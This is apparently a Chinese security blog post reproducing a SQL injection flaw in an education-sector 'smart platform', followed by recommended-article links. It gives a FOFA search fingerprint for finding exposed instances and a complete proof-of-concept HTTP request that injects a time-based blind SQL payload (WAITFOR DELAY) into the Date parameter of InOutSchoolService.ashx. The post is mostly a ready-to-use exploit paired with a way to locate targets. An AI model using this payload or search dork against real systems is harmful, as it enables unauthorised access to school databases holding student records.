EDU 某智慧平台 PersonalDayInOutSchoolData SQL注入漏洞复现

OidBoy_G2024-09-23 1:33

FOFA:body="custom/blue/uimaker/easyui.css"

PoC

复制代码 
POST /ashx/APP/InOutSchoolService.ashx?action=PersonalDayInOutSchoolData&Date=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&AccountNo=1 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Connection: keep-alive

延时5秒

相关推荐
数字供应链安全产品选型4 分钟前
国家级!悬镜安全入选两项“网络安全国家标准应用实践案例”
人工智能·安全·web安全
鹿鸣天涯4 小时前
商用密码应用安全性评估
网络·安全·web安全
骥龙5 小时前
2.5、物联网设备的“免疫系统”:深入解析安全启动与可信执行环境
物联网·安全
jieyu11197 小时前
xxe靶场通关
安全·web安全
捷智算云服务7 小时前
H20裸金属租赁:捷智算安全隔离,独立配置保障数据安全
安全
L47547 小时前
SSL/TLS证书:保障网站安全的关键
网络协议·安全·ssl·tls
A Runner for leave9 小时前
网络与通信安全课程复习汇总2——信息保密
web安全
福澤満満12 小时前
网络安全HTML之旅-标签的基本使用
安全
欢璃12 小时前
修电脑日志--电脑开机黑屏只有光标闪
windows·安全·电脑·安全架构
AIwenIPgeolocation13 小时前
数据流通合规新基建 隐私计算平台的三重安全防线
安全
热门推荐
01BongoCat - 跨平台键盘猫动画工具02GitHub 镜像站点03两千字总结:Codex 国内如何安装和使用的教程,以及如何设置中文回答04UV安装并设置国内源05Linux下V2Ray安装配置指南06GitLab 零基础入门指南:从安装到项目管理全流程07KGG转MP3工具|非KGM文件|解密音频08windows找不到gpedit.msc(本地组策略编辑器)09在VSCode配置Java开发环境的保姆级教程(适配各类AI编程IDE)1046个Nano-banana 精选提示词,持续更新中